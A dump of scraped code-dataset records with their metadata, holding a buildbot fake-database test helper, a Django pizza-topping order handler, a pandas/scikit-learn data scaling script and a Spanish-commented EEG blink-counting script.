self.MASTER_ID:\n self.claims.pop(brid)\n return defer.succeed(None)\n\n def completeBuildRequests(self, brids, results, complete_at=None,\n _reactor=reactor):\n if complete_at is not None:\n complete_at = datetime2epoch(complete_at)\n else:\n complete_at = _reactor.seconds()\n\n for brid in brids:\n if brid not in self.reqs or self.reqs[brid].complete == 1:\n raise buildrequests.NotClaimedError\n\n for brid in brids:\n self.reqs[brid].complete = 1\n self.reqs[brid].results = results\n self.reqs[brid].complete_at = complete_at\n return defer.succeed(None)\n\n def unclaimExpiredRequests(self, old, _reactor=reactor):\n old_epoch = _reactor.seconds() - old\n\n for br in self.reqs.itervalues():\n if br.complete == 1:\n continue\n\n claim_row = self.claims.get(br.id)\n if claim_row and claim_row.claimed_at < old_epoch:\n del self.claims[br.id]\n\n # Code copied from buildrequests.BuildRequestConnectorComponent\n def _brdictFromRow(self, row):\n claimed = mine = False\n claimed_at = None\n claim_row = self.claims.get(row.id, None)\n if claim_row:\n claimed = True\n claimed_at = _mkdt(claim_row.claimed_at)\n mine = claim_row.objectid == self.MASTER_ID\n\n submitted_at = _mkdt(row.submitted_at)\n complete_at = _mkdt(row.complete_at)\n\n return dict(brid=row.id, buildsetid=row.buildsetid,\n buildername=row.buildername, priority=row.priority,\n claimed=claimed, claimed_at=claimed_at, mine=mine,\n complete=bool(row.complete), results=row.results,\n submitted_at=submitted_at, complete_at=complete_at)\n\n # fake methods\n\n def fakeClaimBuildRequest(self, brid, claimed_at=None, objectid=None):\n if objectid is None:\n objectid = self.MASTER_ID\n self.claims[brid] = BuildRequestClaim(brid=brid,\n objectid=objectid, claimed_at=self._reactor.seconds())\n\n def fakeUnclaimBuildRequest(self, brid):\n del self.claims[brid]\n\n # assertions\n\n def assertMyClaims(self, claimed_brids):\n self.t.assertEqual(\n [id for (id, brc) in self.claims.iteritems()\n if brc.objectid == self.MASTER_ID],\n claimed_brids)\n\n\nclass FakeBuildsComponent(FakeDBComponent):\n\n def setUp(self):\n self.builds = {}\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, Build):\n self.builds[row.id] = row\n\n # component methods\n\n def _newId(self):\n id = 100\n while id in self.builds:\n id += 1\n return id\n\n def getBuild(self, bid):\n row = self.builds.get(bid)\n if not row:\n return defer.succeed(None)\n\n return defer.succeed(dict(\n bid=row.id,\n brid=row.brid,\n number=row.number,\n start_time=_mkdt(row.start_time),\n finish_time=_mkdt(row.finish_time)))\n\n def getBuildsForRequest(self, brid):\n ret = []\n\n for (id, row) in self.builds.items():\n if row.brid == brid:\n ret.append(dict(bid=row.id,\n brid=row.brid,\n number=row.number,\n start_time=_mkdt(row.start_time),\n finish_time=_mkdt(row.finish_time)))\n\n return defer.succeed(ret)\n\n def addBuild(self, brid, number, _reactor=reactor):\n bid = self._newId()\n self.builds[bid] = Build(id=bid, number=number, brid=brid,\n start_time=_reactor.seconds, finish_time=None)\n return bid\n\n def finishBuilds(self, bids, _reactor=reactor):\n now = _reactor.seconds()\n for bid in bids:\n b = self.builds.get(bid)\n if b:\n b.finish_time = now\n return defer.succeed(None)\n\n\nclass FakeUsersComponent(FakeDBComponent):\n\n def setUp(self):\n self.users = {}\n self.users_info = {}\n self.id_num = 0\n\n def insertTestData(self, rows):\n for row in rows:\n if isinstance(row, User):\n self.users[row.uid] = dict(identifier=row.identifier,\n bb_username=row.bb_username,\n bb_password=row.bb_password)\n\n if isinstance(row, UserInfo):\n assert row.uid in self.users\n if row.uid not in self.users_info:\n self.users_info[row.uid] = [dict(attr_type=row.attr_type,\n attr_data=row.attr_data)]\n else:\n self.users_info[row.uid].append(\n dict(attr_type=row.attr_type,\n attr_data=row.attr_data))\n\n def _user2dict(self, uid):\n usdict = None\n if uid in self.users:\n usdict = self.users[uid]\n if uid in self.users_info:\n infos = self.users_info[uid]\n for attr in infos:\n usdict[attr['attr_type']] = attr['attr_data']\n usdict['uid'] = uid\n return usdict\n\n def nextId(self):\n self.id_num += 1\n return self.id_num\n\n # component methods\n\n def findUserByAttr(self, identifier, attr_type, attr_data):\n for uid in self.users_info:\n attrs = self.users_info[uid]\n for attr in attrs:\n if (attr_type == attr['attr_type'] and\n attr_data == attr['attr_data']):\n return defer.succeed(uid)\n\n uid = self.nextId()\n self.db.insertTestData([User(uid=uid, identifier=identifier)])\n self.db.insertTestData([UserInfo(uid=uid,\n attr_type=attr_type,\n attr_data=attr_data)])\n return defer.succeed(uid)\n\n def getUser(self, uid):\n usdict = None\n if uid in self.users:\n usdict = self._user2dict(uid)\n return defer.succeed(usdict)\n\n def getUserByUsername(self, username):\n usdict = None\n for uid in self.users:\n user = self.users[uid]\n if user['bb_username'] == username:\n usdict = self._user2dict(uid)\n return defer.succeed(usdict)\n\n def updateUser(self, uid=None, identifier=None, bb_username=None,\n bb_password=None, attr_type=None, attr_data=None):\n assert uid is not None\n\n if identifier is not None:\n self.users[uid]['identifier'] = identifier\n\n if bb_username is not None:\n assert bb_password is not None\n try:\n user = self.users[uid]\n user['bb_username'] = bb_username\n user['bb_password'] = bb_password\n except KeyError:\n pass\n\n if attr_type is not None:\n assert attr_data is not None\n try:\n infos = self.users_info[uid]\n for attr in infos:\n if attr_type == attr['attr_type']:\n attr['attr_data'] = attr_data\n break\n else:\n infos.append(dict(attr_type=attr_type,\n attr_data=attr_data))\n except KeyError:\n pass\n\n return defer.succeed(None)\n\n def removeUser(self, uid):\n if uid in self.users:\n self.users.pop(uid)\n self.users_info.pop(uid)\n return defer.succeed(None)\n\n def identifierToUid(self, identifier):\n for uid in self.users:\n if identifier == self.users[uid]['identifier']:\n return defer.succeed(uid)\n return defer.succeed(None)\n\n\nclass FakeDBConnector(object):\n\n \"\"\"\n A stand-in for C{master.db} that operates without an actual database\n backend. This also implements a test-data interface similar to the\n L{buildbot.test.util.db.RealDatabaseMixin.insertTestData} method.\n\n The child classes implement various useful assertions and faking methods;\n see their documentation for more.\n \"\"\"\n\n def __init__(self, testcase):\n self._components = []\n self.changes = comp = FakeChangesComponent(self, testcase)\n self._components.append(comp)\n self.schedulers = comp = FakeSchedulersComponent(self, testcase)\n self._components.append(comp)\n self.sourcestampsets = comp = FakeSourceStampSetsComponent(self, testcase)\n self._components.append(comp)\n self.sourcestamps = comp = FakeSourceStampsComponent(self, testcase)\n self._components.append(comp)\n self.buildsets = comp = FakeBuildsetsComponent(self, testcase)\n self._components.append(comp)\n self.buildslaves = comp = FakeBuildslavesComponent(self, testcase)\n self._components.append(comp)\n self.state = comp = FakeStateComponent(self, testcase)\n self._components.append(comp)\n self.buildrequests = comp = FakeBuildRequestsComponent(self, testcase)\n self._components.append(comp)\n self.builds = comp = FakeBuildsComponent(self, testcase)\n self._components.append(comp)\n self.users = comp = FakeUsersComponent(self, testcase)\n self._components.append(comp)\n\n def setup(self):\n self.is_setup = True\n return defer.succeed(None)\n\n def insertTestData(self, rows):\n \"\"\"Insert a list of Row instances into the database; this method can be\n called synchronously or asynchronously (it completes immediately) \"\"\"\n for comp in self._components:\n comp.insertTestData(rows)\n return defer.succeed(None)\n\n\ndef _mkdt(epoch):\n # Local import for better encapsulation.\n from buildbot.util import epoch2datetime\n if epoch:\n return epoch2datetime(epoch)\n", "repo_name": "jollyroger/debian-buildbot", "sub_path": "buildbot/test/fake/fakedb.py", "file_name": "fakedb.py", "file_ext": "py", "file_size_in_byte": 41523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "copy.deepcopy", "line_number": 342, "usage_type": "call"}, {"api_name": "buildbot.util.json.loads", "line_number": 354, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 354, "usage_type": "name"}, {"api_name": "buildbot.util.datetime2epoch", "line_number": 378, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 388, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 388, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 392, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 392, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 393, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 393, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 399, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 399, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 401, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 401, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 408, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 408, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 413, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 413, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 417, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 417, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 487, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 487, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 497, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 497, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 530, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 530, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 561, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 561, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 575, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 618, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 618, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 621, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 621, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 648, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 648, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 668, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 668, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 680, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 693, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 693, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 697, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 701, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 701, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 705, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 705, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 707, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 707, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 719, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 719, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 736, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 736, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 739, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 739, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 847, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 847, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 856, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 857, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 857, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 866, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 874, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 874, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 909, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 909, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 916, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 916, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 918, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 918, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 918, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 918, "usage_type": "name"}, {"api_name": "buildbot.util.json.dumps", "line_number": 921, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 921, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 922, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 922, "usage_type": "name"}, {"api_name": "buildbot.util.json.dumps", "line_number": 929, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 929, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 941, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 941, "usage_type": "name"}, {"api_name": "buildbot.util.json.loads", "line_number": 949, "usage_type": "call"}, {"api_name": "buildbot.util.json", "line_number": 949, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 959, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 977, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 977, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 979, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 979, "usage_type": "name"}, {"api_name": "twisted.internet.defer.returnValue", "line_number": 1018, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1018, "usage_type": "name"}, {"api_name": "twisted.internet.defer.inlineCallbacks", "line_number": 981, "usage_type": "attribute"}, {"api_name": "twisted.internet.defer", "line_number": 981, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1020, "usage_type": "name"}, {"api_name": "buildbot.db.buildrequests.AlreadyClaimedError", "line_number": 1023, "usage_type": "attribute"}, {"api_name": "buildbot.db.buildrequests", "line_number": 1023, "usage_type": "name"}, {"api_name": "buildbot.util.datetime2epoch", "line_number": 1025, "usage_type": "call"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1033, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1033, "usage_type": "name"}, {"api_name": "buildbot.db.buildrequests.AlreadyClaimedError", "line_number": 1038, "usage_type": "attribute"}, {"api_name": "buildbot.db.buildrequests", "line_number": 1038, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1044, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1044, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1050, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1050, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1053, "usage_type": "name"}, {"api_name": "buildbot.util.datetime2epoch", "line_number": 1055, "usage_type": "call"}, {"api_name": "buildbot.db.buildrequests.NotClaimedError", "line_number": 1061, "usage_type": "attribute"}, {"api_name": "buildbot.db.buildrequests", "line_number": 1061, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1067, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1067, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1069, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1140, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1140, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1142, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1142, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1160, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1160, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1162, "usage_type": "name"}, {"api_name": "twisted.internet.reactor", "line_number": 1168, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1174, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1174, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1224, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1224, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1231, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1231, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1237, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1237, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1245, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1245, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1277, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1277, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1283, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1283, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1288, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1288, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1289, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1289, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1328, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1328, "usage_type": "name"}, {"api_name": "twisted.internet.defer.succeed", "line_number": 1335, "usage_type": "call"}, {"api_name": "twisted.internet.defer", "line_number": 1335, "usage_type": "name"}, {"api_name": "buildbot.util.epoch2datetime", "line_number": 1342, "usage_type": "call"}]} +{"seq_id": "5594700859", "text": "from orders.models import Order, OrderItem, OrderCounter, ToppingOrderItem, FoodOrderItem\nfrom enum import Enum\n\nTOPPING = \"Topping\"\n\n\nclass PizzaCategory(Enum):\n REGULAR_PIZZA = \"Regular pizza\"\n SICILIAN_PIZZA = \"Sicilian pizza\"\n\n\nclass PizzaName(Enum):\n CHEESE = \"Cheese\"\n ONE_TOPPING = \"1 topping\"\n TWO_TOPPINGS = \"2 toppings\"\n THREE_TOPPINGS = \"3 toppings\"\n SPECIAL = \"Special\"\n\n\nclass PizzaOrderHandler:\n def __init__(self):\n self.pizza = None\n\n def getCurrentPizza(self):\n return self.pizza\n\n def createPizzaOrderItem(self, order, category, name, price):\n toppingAllowance = self.getInitialToppingAllowance(name)\n self.pizza = FoodOrderItem(order=order, category=category, name=name, price=price,\n toppingAllowance=toppingAllowance, isPizza=True)\n self.pizza.save()\n\n def addTopping(self, category, name):\n if self.pizza and self.isCurrentPizzaToppable():\n self._createToppingOrderItem(category, name)\n self._decreaseToppingAllowance()\n\n def removeTopping(self, category, name):\n self._deleteToppingOrderItem(category, name)\n self._increaseToppingAllowance()\n\n def getRemainingToppingAllowance(self):\n return self.pizza.toppingAllowance\n\n def isCurrentPizzaToppable(self):\n return self.pizza.toppingAllowance > 0\n\n def _createToppingOrderItem(self, category, name):\n toppingOrderItem = ToppingOrderItem(foodOrderItem=self.pizza, category=category, name=name)\n toppingOrderItem.save()\n\n def _decreaseToppingAllowance(self):\n if self.pizza.toppingAllowance > 0:\n self.pizza.toppingAllowance -= 1\n self.pizza.save()\n\n def _deleteToppingOrderItem(self, category, name):\n toppingToRemove = ToppingOrderItem.objects.filter(category=category, name=name).last()\n toppingToRemove.delete()\n\n def _increaseToppingAllowance(self):\n self.pizza.toppingAllowance += 1\n\n @staticmethod\n def getAllPizzasToToppingsInUserOrder(order):\n pizzaToToppings = dict()\n for pizzaCategory in [PizzaCategory.REGULAR_PIZZA.value, PizzaCategory.SICILIAN_PIZZA.value]:\n pizzas = FoodOrderItem.objects.filter(order=order, category=pizzaCategory)\n for pizza in pizzas:\n pizzaToToppings[pizza] = ToppingOrderItem.objects.filter(foodOrderItem=pizza)\n\n return pizzaToToppings\n\n @staticmethod\n def getInitialToppingAllowance(pizzaName):\n toppingAllowance = 0\n if pizzaName == PizzaName.ONE_TOPPING.value:\n toppingAllowance = 1\n elif pizzaName == PizzaName.TWO_TOPPINGS.value:\n toppingAllowance = 2\n elif pizzaName == PizzaName.THREE_TOPPINGS.value:\n toppingAllowance = 3\n\n return toppingAllowance\n\n\nclass RemainingToppingAllowanceMessageGenerator:\n def __init__(self, pizzaOrderHandler):\n self.message = None\n self.pizzaOrderHandler = pizzaOrderHandler\n\n def getRemainingToppingAllowanceMessage(self, userOrder):\n latestFoodInBasket = FoodOrderItem.objects.filter(order=userOrder).last()\n if not latestFoodInBasket:\n message = \"Please order an eligible pizza to put topping on.\"\n return message\n\n isLatestFoodPizza = latestFoodInBasket.isPizza\n if isLatestFoodPizza:\n currentPizza = self.pizzaOrderHandler.getCurrentPizza()\n message = \"You can add \" + str(self.pizzaOrderHandler.getRemainingToppingAllowance()) + \" more topping(s).\"\n if currentPizza.name == PizzaName.CHEESE.value or currentPizza.name == PizzaName.SPECIAL.value:\n message = \"\"\n elif not self.pizzaOrderHandler.isCurrentPizzaToppable():\n message = \"All toppings added!\"\n else:\n message = \"Please order an eligible pizza to put topping on.\"\n\n return message\n", "repo_name": "zseen/cs50-web", "sub_path": "project3/orders/helpers/PizzaOrderHandler.py", "file_name": "PizzaOrderHandler.py", "file_ext": "py", "file_size_in_byte": 3942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 12, "usage_type": "name"}, {"api_name": "orders.models.FoodOrderItem", "line_number": 29, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem", "line_number": 49, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "orders.models.ToppingOrderItem", "line_number": 58, "usage_type": "name"}, {"api_name": "orders.models.FoodOrderItem.objects.filter", "line_number": 68, "usage_type": "call"}, {"api_name": "orders.models.FoodOrderItem.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "orders.models.FoodOrderItem", "line_number": 68, "usage_type": "name"}, {"api_name": "orders.models.ToppingOrderItem.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "orders.models.ToppingOrderItem.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "orders.models.ToppingOrderItem", "line_number": 70, "usage_type": "name"}, {"api_name": "orders.models.FoodOrderItem.objects.filter", "line_number": 93, "usage_type": "call"}, {"api_name": "orders.models.FoodOrderItem.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "orders.models.FoodOrderItem", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "5944909271", "text": "from pandas import DataFrame, concat\nfrom pandas.plotting import register_matplotlib_converters\nfrom global_var import * \nfrom ds_charts import get_variable_types\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom matplotlib.pyplot import subplots, show\n\n\n\ndef Standart_Scaler_zscore(file,data,numeric_vars,df_nr,df_sb,df_bool):\n transf = StandardScaler(with_mean=True, with_std=True, copy=True).fit(df_nr)\n tmp = DataFrame(transf.transform(df_nr), index=data.index, columns= numeric_vars)\n norm_data_zscore = concat([tmp, df_sb, df_bool], axis=1)\n #norm_data_zscore.to_csv(f'../../data/week2/{file}_scaled_zscore.csv', index=False)\n #print(norm_data_zscore.describe())\n\n\ndef MinMaxScaler_(file,data,numeric_vars,df_nr,df_sb,df_bool):\n transf = MinMaxScaler(feature_range=(0, 1), copy=True).fit(df_nr)\n tmp = DataFrame(transf.transform(df_nr), index=data.index, columns= numeric_vars)\n norm_data_minmax = concat([tmp, df_sb, df_bool], axis=1)\n norm_data_minmax.to_csv(f'../../data/week2/{file}_scaled_minmax.csv', index=False)\n print(norm_data_minmax.describe())\n\ndef scalling(file,data):\n variable_types = get_variable_types(data)\n numeric_vars = variable_types['Numeric']\n symbolic_vars = variable_types['Symbolic']\n boolean_vars = variable_types['Binary']\n\n df_nr = data[numeric_vars] #table with numeric vars\n df_sb = data[symbolic_vars] #table with symbolic vars\n df_bool = data[boolean_vars] #table with bool vars\n\n #Standart_Scaler_zscore(file,data,numeric_vars,df_nr,df_sb,df_bool)\n MinMaxScaler_(file,data,numeric_vars,df_nr,df_sb,df_bool)\n\n\n\ndef main():\n data_health,data_climate = gbVar()\n \n #scalling(filename_h,data_health)\n scalling(filename_c,data_climate)\n\n\nif __name__==\"__main__\":\n main()", "repo_name": "VicesLorenzo/CDados2223", "sub_path": "code/scaling.py", "file_name": "scaling.py", "file_ext": "py", "file_size_in_byte": 1797, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 21, "usage_type": "call"}, {"api_name": "ds_charts.get_variable_types", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "17729812719", "text": "#coding: latin-1\n#\n# STEM - Blinking Counter\n\n# Este programa es un ejemplo de utilizacion de python para implementar un simple\n# contador de penstaneos basados en una senal de EMG/EMG/EOG.\n#\n# Frecuencia de sampleo Fs = 128\n#\n\nimport csv\nimport numpy as np\n\n\nresults = []\n\n# Esta primera linea, abre el archivo 'blinking.dat' que se grabó\n# al establecerse la conexión con el servidor.\nwith open('data/blinking.dat') as inputfile:\n for row in csv.reader(inputfile):\n rows = row[0].split(' ')\n results.append(rows[1:])\n\nprint ('Longitud del archivo:'+str(len(results)))\n\n# Convert the file into numpy array of ints.\nresults = np.asarray(results)\nresults = results.astype(int)\n\n# Strip from the signal anything you want\n\n\n# La primer columna corresponde a el largo del archivo a considerar\n# en relación a las muestras (1:100 serian las muestras) representante\n# del tiempo.\n# La segunda columna, corresponde a: eeg, attention y meditation.\neeg = results[1:,1]\n\nprint (eeg)\n\n#eeg = np.zeros((64))\n\n#eeg = np.arange(64)\n\n#print eeg.shape\n\n#eeg[32] = -60\n\n#eeg[43] = -130\n\n#eeg = eeg - baseline_als(eeg,10000,0.5)\n\n\nimport matplotlib.pyplot as plt\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n\nax1.plot(eeg,'r', label='EEG')\nplt.legend(loc='upper left');\nplt.show()\n\n\n# El threshold corresponde al limite en amplitud a considerar para discriminar\n# que es un pestañeo de qué no lo es.\nsignalthreshold = 420\n\n\n\nboolpeaks = np.where( eeg > signalthreshold )\nprint (boolpeaks)\ndpeaks = np.diff( eeg )\nprint (dpeaks)\npdpeaks = np.where( dpeaks > 0)\nprint (pdpeaks)\nprint (pdpeaks != 0)\na = np.in1d(pdpeaks,boolpeaks)\nprint (a)\nblinkings = a.sum()\n\nprint ('Blinkings: %d' % blinkings)\n\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\n\npeaks, _ = find_peaks(eeg, height=200)\nplt.plot(eeg)\nplt.plot(peaks, eeg[peaks], \"x\")\nplt.plot(np.zeros_like(eeg), \"--\", color=\"gray\")\nplt.show()", "repo_name": "gabrielamendezg/python-scientific", "sub_path": "contadoreventos.py", "file_name": "contadoreventos.py", "file_ext": "py", "file_size_in_byte": 1924, "program_lang": "python", "lang": "es", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 76, "usage_type": "call"}, {"api_name": "scipy.signal.find_peaks", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "33749892522", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 4 14:17:32 